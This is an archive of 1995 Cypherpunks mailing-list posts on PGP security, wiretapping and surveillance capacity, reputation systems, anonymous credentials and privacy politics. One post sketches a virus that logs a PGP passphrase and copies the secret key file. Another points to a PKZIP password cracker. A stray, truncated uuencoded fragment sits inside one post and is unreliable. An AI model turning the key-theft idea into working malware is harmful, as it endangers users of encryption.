"National borders are just speed bumps on the information superhighway." From ian at virusbtn.com Tue Nov 21 11:07:56 1995 From: ian at virusbtn.com (Ian Whalley) Date: Wed, 22 Nov 1995 03:07:56 +0800 Subject: Virus attacks on PGP In-Reply-To: <199511211743.JAA06639@ix8.ix.netcom.com> Message-ID: <199511211832.SAA12002@elbereth.sophos.com> >>Could a virus write to a write-protected disk? I'm not sure if the >>protection is done in the BIOS or the drive hardware. >In the drive hardware. In certain rare cases, drive hardware fails in such a way to allow write access to write-protected diskettes - I have one such machine here. This appears to happen more often in 5.25" drives - perhaps this is simply because most of the ones I come in contact with are older than the 3.5" ones. This is not a suitable viral attack, however, least of all against a specific target like PGP. However, viruses attacking specific programs are well-known, both in concept and actuality - take AntiEXE, which will corrupt certain sector reads if the sector starts with a given byte pattern. In a similar way it would be possible to attack PGP, at least on DOS platforms. However, it would be dependent upon compiler used/version of PGP/etc etc, and only work in a few cases. More likely is something which waits to see when a certain program is run (let's say PGP :-)), and records keystrokes (keyphrase, anyone?). Then it takes a copy of the secret key file along with the keyphrase, and is able to do whatever it likes with them. Slightly off-topic, for which I apologise, but there we go. I. --------------------------------------------------------------------- | Ian Whalley, Editor, | Phone/Fax : +44-1235-555139/531889 | | Virus Bulletin, | DDI : +44-1235-544039 | | 21 The Quadrant, |------------------------------------------| | Abingdon Science Park, | PGP key : 2A 02 96 E5 5D 77 4C 8D | | Oxon, OX14 3YS, UK. 
| fingerprint : EB 22 14 6F E0 3B A0 D3 | --------------------------------------------------------------------- From chen at intuit.com Tue Nov 21 11:13:13 1995 From: chen at intuit.com (Mark Chen) Date: Wed, 22 Nov 1995 03:13:13 +0800 Subject: Cyberpunk handbook [NOISE] In-Reply-To: <199511210436.UAA26114@jobe.shell.portal.com> Message-ID: <9511211827.AA27657@doom.intuit.com> > You Bay Area people probably know all about this already, but I was > browsing through the local bookstore yesterday and saw Eric Hughes, > Cypherpunks co-founder, on the cover of the "Cyberpunk [sic] Handbook", > a slim satirical volume by the Mondo 2000 people. The book has more > attitude than information, though. Apart from the unfortunate choice of cover model :>, the book is co-authored by Jude Milhon. - Mark - -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From anonymous-remailer at shell.portal.com Tue Nov 21 11:31:56 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 22 Nov 1995 03:31:56 +0800 Subject: toolkits? Message-ID: <199511211859.KAA20466@jobe.shell.portal.com> Alice here ... No, *I* am the real Alice, and I refuse to use PGP signing. Alice de 'nonymous ... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From anon-remailer at utopia.hacktic.nl Tue Nov 21 11:48:00 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Wed, 22 Nov 1995 03:48:00 +0800 Subject: toolkits? Message-ID: <199511211927.UAA20586@utopia.hacktic.nl> |Alice here ... | |No, *I* am the real Alice, and I refuse to use PGP signing. | |Alice de 'nonymous ... | | |P.S. This post is in the public domain. | C. S. U. M. O. C. L. U. N. E. No, *I* am the real Alice, and *I* refuse to use PGP signing. Alice de 'nonymous ... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. 
From david at math.earlham.edu Tue Nov 21 11:56:32 1995 From: david at math.earlham.edu (David Scheidt) Date: Wed, 22 Nov 1995 03:56:32 +0800 Subject: Proving I'm not Bob. In-Reply-To: Message-ID: On Tue, 21 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote: > I had an idea for an advertising based net-payment scheme that has > a particular security flaw making it totally untrustworthy unless it is > possible to prove that you are not a particular person (the publisher > receiving the ad money) when consuming (viewing or otherwise) the ads. What is this system? I can't think of any system that wouldn't work if rearranged so that instead of proving you aren't Bob, you simply don't prove that you are. It is true that they are not isomorphic, and that could be a problem in some situations, but I don't see this as one of them. david -------- David_Scheidt at math.earlham.edu yip yip yip yap yap yak yap yip *BANG* -- no terrier From dlv at bwalk.dm.com Wed Nov 22 04:10:13 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Wed, 22 Nov 95 04:10:13 PST Subject: Java & Netscape security [NOISE] In-Reply-To: <199511221048.CAA26409@jobe.shell.portal.com> Message-ID: Alice de Nonymous writes: > What I'm trying to say is that if someome posts from watson.ibm.com, > and IF they are talking about OS/2, we will not accept that they are > not speaking independantly of the knowledge they have garnered from > watson. I fully agree. I'm not arguing with you. > In the same way, someone who writes from Netscape.com or AT&T, or Sun > and tries to disclaim that they are speaking for the company, when > they step out as an employee of a company is deluding themselves. If you meant "disclaim that they are NOT speaking for the company", then that's what I was saying too. 
Moreover, I think that if someone known to work for Sun posts from Netcom about Sun products, policies, and future plans, s/he'll have both higher credibility and higher responsibility to the readers than a proverbial person from the street. (Sorry for not being able to take this to e-mail.) --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From joshua at isappp.got.net Tue Nov 21 12:17:05 1995 From: joshua at isappp.got.net (joshua geller) Date: Wed, 22 Nov 1995 04:17:05 +0800 Subject: Are there enough FBI agents to handle Digital Telephony????? In-Reply-To: Message-ID: <199511211948.LAA29791@isappp.got.net> moroni at scranton.com writes: > If you ask me if there is something for them to worry about I have to > in all good conscience say yes , if you ask if there is something for us > to worry about again I have to say yes. I don't know if there is even a > common ground for both sides to work towards because terrorism has grown > to include the homegrown variety . what are you talking about? there has always been homegrown terrorism. at various times in the past it has been much more intense than it is now. read a little bit about the history of the labor movement in this country (ie, in the united states of america). josh From ses at tipper.oit.unc.edu Tue Nov 21 12:24:28 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 22 Nov 1995 04:24:28 +0800 Subject: Proving I'm not Bob. In-Reply-To: Message-ID: On Tue, 21 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote: > I had an idea for an advertising based net-payment scheme that has > a particular security flaw making it totally untrustworthy unless it is > possible to prove that you are not a particular person (the publisher > receiving the ad money) when consuming (viewing or otherwise) the ads. Obvious approach probably makes the rest of the protocol useless but... 
If you force everything to be signed using keys corresponding to certificates issued by a trusted agency, that CA can be used to guarantee the inequality. From ethridge at Onramp.NET Tue Nov 21 13:06:13 1995 From: ethridge at Onramp.NET (Allen B. Ethridge) Date: Wed, 22 Nov 1995 05:06:13 +0800 Subject: Are there enough FBI agents to handle Digital Telephony????? Message-ID: In addition to the large quantity they want, they also want to be able to deliver the conversation from a mobile suspect to mobile agents who are following the suspect. So even if you use a digital set with "voice privacy" activated that government car behind you might still be listening to you. The FBI's "requirements" present an entertaining set of logistical problems. Simply equipping the switches to handle the extra capacity, especially during busy hour, is problematic. allen From ylo at cs.hut.fi Tue Nov 21 13:39:27 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Wed, 22 Nov 1995 05:39:27 +0800 Subject: Are there enough FBI agents to handle Digital Telephony????? In-Reply-To: Message-ID: <199511212053.VAA02472@trance.olari.clinet.fi> > For instance, if 1% of America is on the phone during the peak > hours of the day, then that puts 2.5 million Americans on the > phone or 1.25 million conversations. If the FBI wants access to > 1% of that, that is still 12,500 simulataneous conversations. > That would seem to imply 12,500 people to listen to the tapes, > right? Would that take agents off the streets? On the other hand, if you only want to collect rough background information about people who might become significant later, it is enough to store the conversations in a computer (storage is orders of magnitude cheaper than the man-time to listen to the tapes), and only listen the tapes if the person becomes interesting. Besides, computer technology is approaching the point where you can eliminate the human from the link entirely, except for final verification. 1. 
Speech recognition already works quite well. There was an article about a 20.000 word speaker-independent system a few years ago, operating 1/7th of real time on an alpha workstation.

2. Automatic speaker recognition from voice works quite well if my understanding is correct. (Useful for picking up interesting conversations for further analysis when you get them from sources you don't normally monitor).

3. Computers have been able to pick up potentially interesting conversations by keywords for decades. Also useful for picking up interesting conversations for further analysis from sources you don't monitor very actively. (Of course, you can additionally use phone numbers, mobile phone *phone* identification codes, etc.)

4. A lot of work is being done in classifying transcripts based on their content, on message understanding. In other words, a lot of the analysis work can be automated now or in the near future. The computer can then answer questions from the data and for example select individuals for further analysis based on complex criteria.

5. A lot of work is being done on data mining (i.e., finding new data from small pieces of individual data in a database, such as purchase logs, etc.). This is one of the hot topics in database conferences right now.

6. Research is being done in massive databases. There was an Intelligence Community research initiative a couple of years ago on massive databases; if my memory serves me right, they were talking about 2-3 *petabytes* (10^12) as the size of the final database (no, it was not gigabytes and it was not terabytes). I believe I still have the announcement saved somewhere if somebody wants it.

All of these technologies are feasible now or in the near future.
Then add a little spice: the hundreds of thousands of surveillance TV cameras around (did you know that there is a computer system that can recognize and look up 25 faces per second from a database of a million faces - used to control football hooligans and shoplifters for instance, but has other uses as well), car movement records from highway payment systems, purchase records obtained from credit card companies, banks and retail chains, link up to medical records, tax databases, employment records, etc. Add full knowledge of flight and other travel reservations, some fax, e-mail and telegram intercepts. Now, what have you got (besides effective tools for finding criminals)? Tatu From ahupp at primenet.com Tue Nov 21 13:45:53 1995 From: ahupp at primenet.com (Adam Hupp) Date: Wed, 22 Nov 1995 05:45:53 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. Message-ID: <199511212106.OAA22450@usr1.primenet.com> >Date: Tue, 21 Nov 1995 02:10:02 +0100 >From: Tatu Ylonen >To: ahupp at primenet.com >Cc: cypherpunks at toad.com >Subject: Re: NSA, ITAR, NCSA and plug-in hooks. > >> PKZIP allows encryption (other's ?). How about a hook to that? > >PKZIP "encryption" is self-deception. A program for cracking it, >PKCRACK, is widely available on the internet. See e.g. >ftp.funet.fi:/pub/crypt/analysis. > >[For information about internationally available cryptographic >software, see http://www.cs.hut.fi/crypto.] > > Tatu Ylonen PKCRACK uses a dictionary attack. Anyway, my point was that you could use PKZIP's encryption as an excuse for passing a password.
From dreschs at mpd.tandem.com Tue Nov 21 13:56:01 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Wed, 22 Nov 1995 05:56:01 +0800 Subject: "Junk E-Mail" In-Reply-To: <199511211647.RAA15185@utopia.hacktic.nl> Message-ID: <199511212111.PAA12087@galil.austnsc.tandem.com> nobody at REPLAY.COM (Anonymous) said: A> Sten wrote: >> They (as in, the government) has used the RICO laws against Operation >> Rescue, an anti-abortion/pro-life (pick your term) group for >> protesting/picketing abortion clinics and doctors who perform >> abortions. A> And for successfully encouraging the murder of doctors. Sorry, but the RICO case had nothing to do with any of the murders. And if you're gonna go after OR&company for encouraging the murder of doctors, I hope you're also going after certain rappers for encouraging the murder of police. >> If they had prosecuted under statutes which applied to everyone, I >> wouldn't have had a problem, but they are going after OR and similar >> organizations for using tactics similar to those used by civil rights >> protesters in the 60s. A> Who were systematically arrested, beaten, teargassed, A> wiretapped, and even occasionally shot at. I *know*--I got firehosed, A> beaten, arrested, and wiretapped for what I did. That's why I'm a A> Cypherpunk now. OR has received far better treatment than the civil A> rights protesters ever did--or did I miss the news items reporting A> that Terry Randall and Ralph Reed had been assassinated, and that A> their lieutenants had been bumped off in black-bag jobs, and that A> their colleagues were chained down to chairs *in court*? And the treatment you received then was wrong. Does that make admittedly less violent treatment of OR&company right? At risk of your calling it a 'nursery rhyme', or something similarly trivializing, two wrongs don't make a right. 
-- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From weidai at eskimo.com Tue Nov 21 14:00:34 1995 From: weidai at eskimo.com (Wei Dai) Date: Wed, 22 Nov 1995 06:00:34 +0800 Subject: towards a theory of reputation Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Many of the topics discussed on this list are economic in nature. Unfortunately cypherpunks haven't attracted the attention of professional economists who might be willing to apply their analytic tools to these issues. Reputation is one of these issues that is especially important. I'm not an economist, so I hope these ramblings do not discourage real economists from tackling reputation as a serious research project. The first step toward a theory of reputation is defining what reputation is. The definition should correspond closely enough to our common sense notion of reputation so that our intuitions about it are not completely useless. I think a good definition is this: Alice's reputation of Bob is her expectation of the results of future interactions with Bob. If these interactions are mainly economic in nature, then we can represent Alice's reputation of Bob by a graph with the horizontal axis labeled price and the vertical axis labeled expected utility. A point (x,y) on the graph means that Alice expects to get y utils in a business transaction where she pays Bob x dollars. Given this definition, it is natural to say the Bob's reputation is the set of all other people's reputations of Bob. A reputation system consists of a set of entities, each of whom has a reputation and a method by which he changes his reputation of others. I believe the most important question for a theory of reputation to answer is what is a good method (reputation algorithm) by which a person changes his reputation of others. 
A good reputation algorithm must serve his self-interest; it must not be (too) costly to evaluate; its results must be stable; a reputation system where most people use the algorithm must be stable (i.e., the reputation system must be an evolutionarily stable system). In a reputation based market, each entity's reputation has three values. First is the present value of expected future profits, given the reputation (let's call it the operating value). Note that the entity's reputation allows him to make positive economic profits, because it makes him a price-maker to some extent. Second is the profit he could make if he threw away his reputation by cheating all of his customers (throw-away value). Third is the expected cost of recreating an equivalent reputation if he threw away his current one (replacement cost). Now it is clear that if a reputation's throw-away value ever exceeds its operating value or replacement cost, its owner will, in self-interest, throw away his reputation by cheating his customers. In a stable reputation system, this should happen very infrequently. This property may be difficult to achieve, however, because only the reputation's owner knows what its values are, and they may fluctuate widely. For example the operating value may suddenly decrease when his competitor announces a major price cut, or the replacement cost may suddenly decrease when he succeeds subverting a respected reputation agency. One way to answer some of these questions may be to create a model of a reputation system with a simple reputation algorithm and a simplified market, and determine by analysis or simulation whether it has the desirable properties. I hope someone who has an economist friend can persuade him to do this. 
Wei Dai -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMLI9Ujl0sXKgdnV5AQECCQQAiHq+s3PfsEOJmk0ng9aETQwHVe5EvrA0 +0wimcO2IGf+Bix8J/bLtAlW2eEcXM90pMvBgv+Q4jTkvI5RvGyuMf5cvOgj6rTz wj9aCqoltjHm/l1dfoWWCn4VSIU8OAJ6wKN/HRANQ5B56TPOgEkS2EDSM2C3w4m9 BgwcG5rBeA8= =taTA -----END PGP SIGNATURE----- From hallam at w3.org Tue Nov 21 14:41:33 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 22 Nov 1995 06:41:33 +0800 Subject: "Dear Newt" Letter... In-Reply-To: <199511210028.TAA15346@jekyll.piermont.com> Message-ID: <9511210055.AA29106@zorch.w3.org> >Er, Newt was the one who railed against the Exon censorship bill, and >who's said in public that clipper is unrealistic. And where does that get us? Did Newt stop the Exon bill in its tracks? Did he do anything to stop the wiretap bill? If Newt is all stewed up then how come there isn't a provision in his budget bill to force these laws to be dismantled the same way that there are provisions on just about every other part of his agenda? Face it, Newt may speak from the heart, but he acts from his pocket. We haven't put enough into his back pocket to get attention. Phill From futplex at pseudonym.com Tue Nov 21 14:53:16 1995 From: futplex at pseudonym.com (Futplex) Date: Wed, 22 Nov 1995 06:53:16 +0800 Subject: Proving I'm not Bob. In-Reply-To: Message-ID: <199511212210.RAA11334@thor.cs.umass.edu> s1113645 at tesla.cc.uottawa.ca writes: > I had an idea for an advertising based net-payment scheme that has > a particular security flaw making it totally untrustworthy unless it is > possible to prove that you are not a particular person (the publisher > receiving the ad money) when consuming (viewing or otherwise) the ads. david writes: > What is this system? I can't think of any system that wouldn't work if > rearranged so that instead of proving you aren't Bob, you simply don't > prove that you are. 
It is true that they are not isomorphic, and that > could be a problem in some situations, but I don't see this as one of them. I don't know what particular scheme s1113645 has in mind. But as you point out, not proving P is very different from proving not-P. Generally, a scheme that charges for advertising based upon the measured number of accesses to the advertising has the kind of authentication problem mentioned above. The party paying for the advertising only wants to pay to reach "legitimate" customers. A dishonest publisher (selling ad space) could access the advertising many times herself to artificially inflate the access figures, justifying higher advertising charges. To avoid paying for this "illegitimate" traffic, the advertiser would like to authenticate the accesses as *not* coming from the untrusted publisher. This is a hard problem in general, because the advertiser really wants to discount accesses by the publisher, her agents, her family, her friends, etc. It's tough to prove that you're not working for someone else at a formal protocol level. (Note that widespread "legitimate" anonymous accesses of material can severely damage the reliability of these kinds of measurement-based payment schemes.) I think this thread is rapidly straying from cpunks relevance.... -Futplex From hfinney at shell.portal.com Tue Nov 21 15:07:41 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 22 Nov 1995 07:07:41 +0800 Subject: Proving I'm not Bob. In-Reply-To: Message-ID: <199511212233.OAA16781@jobe.shell.portal.com> s1113645 at tesla.cc.uottawa.ca writes: >I had an idea for an advertising based net-payment scheme that has >a particular security flaw making it totally untrustworthy unless it is >possible to prove that you are not a particular person (the publisher >receiving the ad money) when consuming (viewing or otherwise) the ads. 
BTW, we had some interesting postings here last year from Jason Solinsky (solman at mit.edu) about schemes involving advertising and payment, where people would get paid to view advertisements. Is this the kind of thing you're thinking of? I posted some ideas once on how to prove that you are not someone else. Any such scheme has to be grounded in a physical mechanism to determine that two people are different. For example, you might be able to get some special cryptographic signature or credential from an agency by showing some biometric information, such as retina or thumb prints. You wouldn't necessarily have to reveal your name, identity, or any other information; just something which would allow the agency to be sure that they had not given such a credential out to you before. If you didn't care about privacy, your problem could then be solved simply by having each person exhibit his credential (these are often called "is-a-person" credentials). The more interesting question then becomes exhibiting that credential in a privacy protecting way, but still being able to tell if two people are showing the same or different credentials. There are various ways of doing this; one of the simplest would be for the agency to give you a blind signature using a particular exponent, where you would be allowed exactly one of each exponent. You unblind these, and to show you aren't Bob both you and Bob show your signatures for some matching exponent, which will be different. Because of the blinding, no one will link the credential to your identifying information, and because it is a signature from the agency, no one can forge a credential different from the one they have. Depending on the situation and your tradeoffs between convenience and privacy, you might discard used credentials (for maximum privacy), or you might reuse them in a particular forum where you have persistent identity (for maximum convenience). 
In the latter case, the exponent used could be associated with the forum, which is the idea behind Chaum's pseudonym system.

Hal Finney
hfinney at shell.portal.com

From fair at clock.org Tue Nov 21 15:24:04 1995
From: fair at clock.org (Erik E. Fair (Time Keeper))
Date: Wed, 22 Nov 1995 07:24:04 +0800
Subject: "The Right To Privacy" by Caroline Kennedy, et. al.
Message-ID:

In an EPIC Alert on 10:46 10/23/95, Dave Banisar wrote:

>"The Right to Privacy," November 9. Authors Caroline Kennedy and Ellen
>Alderman discuss their new book on privacy. Lizner Auditorium, George
>Washington University, Washington, DC. Contact 202/357-3030.

Did anyone here go to this event, or has read the book yet? There is a review of it in TIME magazine at this URL:

http://pathfinder.com/@@iEPVLuF5EgMAQChZ/time/magazine/domestic/1995/951106/publishing.html

thanks,
Erik Fair

From frantz at netcom.com Tue Nov 21 15:59:27 1995
From: frantz at netcom.com (Bill Frantz)
Date: Wed, 22 Nov 1995 07:59:27 +0800
Subject: Virus attacks on PGP
Message-ID: <199511212326.PAA06093@netcom8.netcom.com>

At 8:34 11/21/95 -0500, SINCLAIR DOUGLAS N wrote:
>> Certainly having PGP run from a CDROM or other read-only device would be a
>> big help. Even better would be to have all the privileged code also run
>> from a read-only device.
>
>Seeing as PGP is quite small the simplest and cheapest read-only device
>would be a write-protected floppy disk.

But do remember that your copy of PGP could be infected as it is loaded from the disk. You really need to protect your privileged code too.

Bill

From carolann at censored.org Tue Nov 21 16:02:02 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Wed, 22 Nov 1995 08:02:02 +0800
Subject: The Congressional Mailbot
Message-ID: <199511212318.QAA26412@mailhost1.primenet.com>

Here's your chance to protest ITAR and whatever other CPUNK thing you feel worthwhile. Enjoy!

CONGRESSIONAL MAILBOT SERVICE

This service is provided to make it easy for you to get your message to all members of the House or Senate that have E-Mail mailboxes. By sending a single message to the service addressed at HOUSE at MAILBOT.COM and/or SENATE at MAILBOT.COM, your single message will be expanded and resent to all members of those specified houses as if YOU had E-Mailed each and every one of them yourself. Any E-Mail responses to your inquiries will be sent directly back to your own E-Mail box.

WHERE DO I SEND MY E-MAIL TO MAKE THIS HAPPEN?

In order to use this service, you need to address your E-Mail to one or both of the addresses listed below.

FOR MEMBERS OF THE US HOUSE: House at Mailbot.com
FOR MEMBERS OF THE US SENATE: Senate at Mailbot.com

WHO WILL RECEIVE THIS E-MAIL?

Your incoming message is sent to all currently known members of congress that have E-Mail mailboxes. The Congressional Mailbot System updates its list of members of both the Houses every 30 days. At that time, new email addresses are added to the Mailbot Server.

WHAT TO INCLUDE IN YOUR MESSAGE?

Most members of congress do not have the staff to deal with replies via both regular mail and E-Mail. Most would prefer to reply to your specific request by way of regular postal mail. In order for them to do that, you need to include your NAME, ADDRESS, CITY & STATE so that they can send you a response.

WHAT NOT TO INCLUDE IN YOUR MESSAGE?

Basically, your message should be short and to the point. It is not wise to include large amounts of text from other sources. If you want to point out to them about such sources, simply tell them where you saw it. Imagine getting hundreds of email messages containing the same material over and over. The meaning gets lost. Make your message clear and easy to read.

WARNING

Each member of the House or Senate which receives a message from you via the Mailbot, will respond with a reply message. THIS CAN GENERATE A LOT OF EMAIL INTO YOUR MAILBOX.
If for example, at the time you send your request to the Mailbot, there are 130 members of the specific house you select, you will get back 130 reply messages from those members when they receive your message. Currently, the automatic replies are about 750 bytes in size and only contain a header with no message body. These replies are sent to let you know that the Congress Person you sent the message to, has received it in their E-Mailbox. Some users use systems that only allow so much email per month for free and then charge for email sent/received after that! IF YOU CANNOT HAVE THIS AMOUNT OF TRAFFIC IN YOUR MAILBOX PLEASE DO NOT USE THIS SERVICE! WHAT IF I WANT TO SEND A MESSAGE TO A SPECIFIC Congress Persons? THEN YOU SHOULD NOT USE THIS SERVICE! This service is for E-Mail intended for ALL members of the House and/or Senate. Individual messages to specific Congress Persons should be sent by other means. LIMITATIONS: This is a very popular tool.... Several rules need to be enforced to ensure that this service does not overburden the systems that are connected to it. The following rules are in place... 1 The Mailbot will reject any message that is larger than 5,000 bytes in size. This provides you with a total of 66 lines of 80 columns per line for your message which is a whole page of information to make your point. 2 Please limit usage of the mailbot to no more than one message per 72 hour period (one each to HOUSE and SENATE is ok). 3 Abusive and obscene messages violate the purpose and spirit of this service and WILL place the originator of such messages on a rejection list. Users who cannot abide by the above limitations will be placed permanently on a rejection list and all further attempts to use the service will result that user's messages being rejected by the service. PROBLEMS OR QUESTIONS? If you have any problems or questions about this service, please direct them to the following E-Mail address: Mailbot at Mailbot.Com TELL A FRIEND? 
If you should tell a friend or colleague about this service, PLEASE INCLUDE THIS MESSAGE. This will save them time in knowing what is permitted and will keep questions about the service down to a minimum. This Service is Provided By: MAILBOT SERVICES OF ARIZONA (c) 1995 Mailbot Services of Arizona. -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From hfinney at shell.portal.com Tue Nov 21 16:09:13 1995 From: hfinney at shell.portal.com (Hal) Date: Wed, 22 Nov 1995 08:09:13 +0800 Subject: towards a theory of reputation In-Reply-To: Message-ID: <199511212332.PAA24563@jobe.shell.portal.com> Wei Dai writes: >The first step toward a theory of reputation is defining what reputation >is. The definition should correspond closely enough to our common sense >notion of reputation so that our intuitions about it are not completely >useless. I think a good definition is this: Alice's reputation of Bob is >her expectation of the results of future interactions with Bob. If >these interactions are mainly economic in nature, then we can represent >Alice's reputation of Bob by a graph with the horizontal axis labeled >price and the vertical axis labeled expected utility. A point (x,y) on >the graph means that Alice expects to get y utils in a business transaction >where she pays Bob x dollars. Given this definition, it is natural to say >the Bob's reputation is the set of all other people's reputations of Bob. This is an interesting approach. However this seems to fold in issues of reliability with issues of quality and value. 
If I have a choice of two vendors, one of whom produces a product which is twice as good, but there is a 50% chance that he will abscond with my money, I am not sure how to value him compared with the other. It seems like the thrust of the analysis later is to determine whether people will in fact try to disappear. But that is not well captured IMO by an analysis which just ranks people in terms of "utility" for the price. >A reputation system consists of a set of entities, each of whom has a >reputation and a method by which he changes his reputation of others. >I believe the most important question for a theory of reputation to answer >is what is a good method (reputation algorithm) by which a person changes >his reputation of others. A good reputation algorithm must serve his >self-interest; it must not be (too) costly to evaluate; its results must >be stable; a reputation system where most people use the algorithm must >be stable (i.e., the reputation system must be an evolutionarily stable >system). I am not sure about this last point. It seems to me that a good reputation is one which is most cost-effective for its owner. Whether it is good for social stability is not relevant to the person who is deciding whether to use it. ("But what if everyone behaved that way? How would you feel then?") It may be nice for the analyst but not for the participant. >In a reputation based market, each entity's reputation has three values. >First is the present value of expected future profits, given the reputation >(let's call it the operating value). Note that the entity's reputation >allows him to make positive economic profits, because it makes him a >price-maker to some extent. Second is the profit he could make if he >threw away his reputation by cheating all of his customers (throw-away >value). Third is the expected cost of recreating an equivalent reputation >if he threw away his current one (replacement cost). I don't really know what the first one means. 
There are a lot of different ways I can behave, which will have impact on my reputation, but also on my productivity, income, etc. There are other ways I can damage my reputation than by cheating, too. I can be sloppy or careless or just not work very hard. So the first two are really part of a continuum of various strategies I may apply in life. The second is pretty clear but the first seems to cover too wide a range to give it a value. >Now it is clear that if a reputation's throw-away value ever exceeds its >operating value or replacement cost, its owner will, in self-interest, >throw away his reputation by cheating his customers. In a stable reputation >system, this should happen very infrequently. This property may be >difficult to achieve, however, because only the reputation's owner knows >what its values are, and they may fluctuate widely. For example the >operating value may suddenly decrease when his competitor announces >a major price cut, or the replacement cost may suddenly decrease when >he succeeds subverting a respected reputation agency. It would be useful to make some of the assumptions a bit clearer here. Is this a system in which cheating is unpunishable other than by loss of reputation, our classic anonymous marketplace? Even if so, there may be other considerations. For example, cheating may have costs, such as timing the various frauds so that people don't find out and extricate themselves from vulnerable situations before they can get stung. Also, as has been suggested here in the past, people may structure their interactions so that vulnerabilities to cheating are minimized, reducing the possible profits from that strategy. >One way to answer some of these questions may be to create a model of >a reputation system with a simple reputation algorithm and a simplified >market, and determine by analysis or simulation whether it has the >desirable properties. I hope someone who has an economist friend can >persuade him to do this. 
It might be interesting to do something similar to Axelrod's Evolution of Cooperation, where (human-written) programs played the Prisoner's Dilemma against each other. In that game, programs had reputations in a sense, in that each program when it interacted with another remembered all their previous interactions, and chose its behavior accordingly. The PD is such a cut-throat game that it apparently didn't prove useful to try to create an elaborate reputation-updating model (at least in the first tournaments; I understand that in later versions some programs with slightly non-trivial complexity did well). What you might want to do, for simplicity, is to have your universe consist of just one good (or service, or whatever), with some producers who all have the same ability, and some consumers, all with the same needs. Where they differ would be in their strategies for when to cheat, when to be honest, when to trust, and when to be careful. At any given time a consumer must choose which producer to buy from. The details of their interaction would appear to greatly influence the importance of reputation. Maybe there could be a tradeoff where if the consumer is willing to pay in advance he gets a better price than if he will only provide cash on delivery. (Unfortunately it seems like the details of this tradeoff will basically determine the outcome of the experiment. However maybe some values will lead to interesting behavior.) Producers who want to cheat could do so by offering greater discounts for payment in advance, offering low prices in order to attract as many customers as possible before disappearing. Consumers might rightly be suspicious of an offer that looks too good. Maybe it could be set up so consumers could cheat, too. No, I think that is too complicated. Then producers would have to know consumers' reputations and I think it gets muddy. Probably it would be simplest to just have producers have reputations. 
Hal From perry at piermont.com Wed Nov 22 08:10:33 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 22 Nov 95 08:10:33 PST Subject: rand-test In-Reply-To: Message-ID: <199511221609.LAA21172@jekyll.piermont.com> "James M. Cobb" writes: > Friend, > > > The following information from 1) You are not my friend. 2) My private mail to you hasn't convinced you to stop this barrage of reposts. Would you please do so? .pm From jya at pipeline.com Tue Nov 21 16:10:49 1995 From: jya at pipeline.com (John Young) Date: Wed, 22 Nov 1995 08:10:49 +0800 Subject: [NOISE] Interesting statement by Alameda County DA Message-ID: <199511212334.SAA02295@pipe1.nyc.pipeline.com> Responding to msg by iang at cory.EECS.Berkeley.EDU (Ian Goldberg) on Tue, 21 Nov 1:50 PM >One of the speakers was Don Ingraham, Assistant >District Attorney, Alameda County. In responding to a >question from the audience, he said: > >"You're making a distinction between criminals and big >business. > That is not my experience." Assistant Devil's Angel Ingraham cites two out of three, the other is the omnipresent public safety racket -- his temp job in train to future peace by salubrious punishment of the other two overtense sinners. Often, a backlasher rep in one leads to a pretend- thrasher slot in the others. RICO, for instance, is an ingenious selective-caning law for flyswatting one conspirator by another but to not go so far as to bruise flesh and foreclose franchises for prosecutorial "shiatsu." This ancient soft-drubbing by one of the others is meant to conceal their common-origin ritual of corporeal writhings, manipulations, strokings, caresses and digitizers to debase from upright to bent to kneeling to prone succeeding down ladder, applying lubricants, linguants, unguents, balms, dental whiteners and body hair to head, to rest six under. Criminal, financial, legal -- indistinguishable from any other mortality-salving levitationism. -- From The One Outback Truth. 
> "Hey, Ian _said_ it was noise." From lwp at conch.aa.msen.com Tue Nov 21 16:35:54 1995 From: lwp at conch.aa.msen.com (Lou Poppler) Date: Wed, 22 Nov 1995 08:35:54 +0800 Subject: Mandarins, Lifers, and Talents In-Reply-To: Message-ID: On Thu, 16 Nov 1995 16:02:09 -0500, rah at shipwright.com (Robert Hettinga) wrote: } One of my messier theories about the internet is that it was invented by } mandarins. Now the talents, the people you call pioneers, have moved in, } and they're much more pragmatic, and have little patience for crystalline } perfection, because inefficiency and chaos is where they find beauty, joy, } and all those other nasty imprecise concepts. When thing settle down a bit, } the lifers will come. They're trying to do it now, by building sites like } www.time.com, or buying into sites like www.wired.com. Waitaminute, I still remember the Old Days. I helped run one corner of the MERIT network, back when it only offered proto-telnet interactive connections to three mainframes total. The network ran on PDP-11s lashed crudely to our mainframes and connected to each other on 4800 baud leased lines (half-duplex). Mandarins were involved in the genesis, certainly, both of our little college network, and of the military's arpanet. The mandarins provided our subsidies, and some of them found ways to use the net in doing their academic work. Very many of them ignored us. Among us paid computer staff, the mandarins held occasional blue-sky meetings to plot the future and standards for the future; the lifers went about their business of feeding hollerith cards to the mainframes; and the talents immediately set 